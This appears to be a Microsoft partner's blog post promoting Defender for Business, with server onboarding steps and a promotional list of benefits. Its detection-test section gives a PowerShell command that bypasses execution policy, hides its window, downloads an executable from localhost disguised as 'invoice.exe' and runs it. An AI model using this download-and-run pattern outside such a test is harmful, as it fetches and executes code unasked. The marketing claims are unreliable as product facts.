Microsoft EDR Solution: Step-by-Step Onboarding Guide
Overview
Microsoft EDR is a comprehensive and integrated EDR solution that leverages the capabilities of Microsoft Defender for Endpoint, Microsoft 365 Defender, and Azure Sentinel. It provides organizations with complete visibility, detection, investigation, and response capabilities across their endpoint environment. It also offers several advantages over other EDR solutions, such as comprehensive coverage, integrated functionality, cloud-based delivery, cost-effectiveness, and ease of use. Click here to know more about Microsoft EDR Solution.
This blog post provides you a brief overview of Microsoft Defender for Business, its benefits and installation procedures.
What is Microsoft Defender for Business?
Cybersecurity is a top priority for any business in the digital age. Cyberattacks can cause significant damage to your reputation, productivity, and bottom line. That’s why you need a comprehensive and reliable solution to safeguard your data, devices, and network from malicious actors.
Microsoft Defender for Business is one of the best options available today. A cloud-based security platform that integrates with Microsoft 365 and Azure to provide end-to-end protection for your organization.
Benefits
Microsoft Defender for Business offers a range of features and benefits that make it a superior choice for your cybersecurity needs. Here are some of them:
- Leverages artificial intelligence and machine learning to detect and respond to threats in real time. It uses advanced behavioral analytics and threat intelligence to identify and block known and unknown attacks, such as ransomware, phishing, and zero-day exploits.
- Enables you to manage your security posture from a single dashboard. You can easily monitor and control your devices, applications, data, and identity across your entire organization. You can also set policies and rules to enforce compliance and best practices.
- Empowers you to prevent data breaches and data loss. It encrypts your data at rest and in transit and allows you to control who can access it and how. It also helps you recover your data in case of an incident, with built-in backup and restore capabilities.
- Supports your remote workforce and hybrid work environment. It allows you to secure your devices and data wherever they are, whether on-premises or in the cloud. It also integrates with Microsoft Teams and other collaboration tools to enable secure communication and teamwork.
- Reduces your costs and complexity. It eliminates the need for multiple security products and vendors and simplifies your security management and operations. It also offers flexible pricing options that suit your budget and needs.
Onboarding Microsoft Defender for Business on Windows Servers
To install Microsoft Defender for Business on Windows servers
- Log in to the Microsoft Defender portal https://security.microsoft.com/ with Admin credentials.
- In the left pane, go to Settings, then click Endpoints.
- In the Endpoints page, under Device Management, click Onboarding.
- In the Select operating system to start onboarding process dropdown, choose the respective server OS. For example, Windows Server 1803, 2019 and 2022.
- In the Onboard a device section, click the Deployment Method dropdown, and then choose Group Policy.
- Click Download the Onboarding package into the respective server, this will download the OptionalParamsPolicy folder and WindowsDefenderATPOnboardingScript file.
- Double-click the WindowsDefenderATPOnboardingScript file to run the script. The Windows protected your PC dialog box appears.
- Click More info.
-
- Click Run anyway.
It takes a while to onboard the device.
Running a Detection Test
To verify that the device is properly onboarded and reporting to the service, run the detection script on the newly onboarded device:
- Open Command Prompt window.
- In the prompt, copy and run the command below.
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
The Command Prompt window closes automatically.
If successful, the detection test will be marked as completed and a new alert will appear in few minutes.
Microsoft Defender for Business is a powerful and comprehensive security solution that can help you protect your organization from cyber threats. If you want to learn more about how it works and how it can benefit you, contact us today. We are a certified Microsoft partner and we can help you implement and optimize Microsoft Defender for Business for your business.